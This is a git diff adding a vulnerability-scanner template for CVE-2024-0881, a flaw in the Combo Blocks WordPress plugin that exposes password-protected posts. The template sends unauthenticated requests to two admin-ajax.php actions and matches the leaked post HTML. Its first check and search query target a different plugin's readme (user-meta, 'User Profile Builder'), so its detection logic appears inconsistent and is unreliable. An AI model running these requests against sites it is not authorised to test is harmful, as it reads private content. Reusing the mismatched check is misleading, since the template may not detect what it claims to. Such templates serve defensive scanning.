diff --git a/http/cves/2024/CVE-2024-0881.yaml b/http/cves/2024/CVE-2024-0881.yaml
new file mode 100644
index 0000000000..fdd0a288bd
--- /dev/null
+++ b/http/cves/2024/CVE-2024-0881.yaml
@@ -0,0 +1,54 @@
+id: CVE-2024-0881
+
+info:
+  name: Combo Blocks < 2.2.76 - Improper Access Control
+  author: Kazgangap
+  severity: medium
+  description: |
+    The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts
+  reference:
+    - https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/
+    - https://github.com/fkie-cad/nvd-json-data-feeds
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-0881
+  classification:
+    cve-id: CVE-2024-0881
+    cwe-id: CWE-284
+    epss-score: 0.00043
+    epss-percentile: 0.08268
+  metadata:
+    verified: true
+    max-request: 3
+    publicwww-query: "/wp-content/plugins/user-meta/"
+  tags: cve,cve2024,wp,wpscan,wordpress,wp-plugin,combo-blocks,exposure
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/user-meta/readme.txt'
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - 'User Profile Builder'
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free"
+      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '{"html"'
+          - '"<div class='
+          - '"pagination":'
+        condition: and
+
+      - type: status
+        status:
+          - 200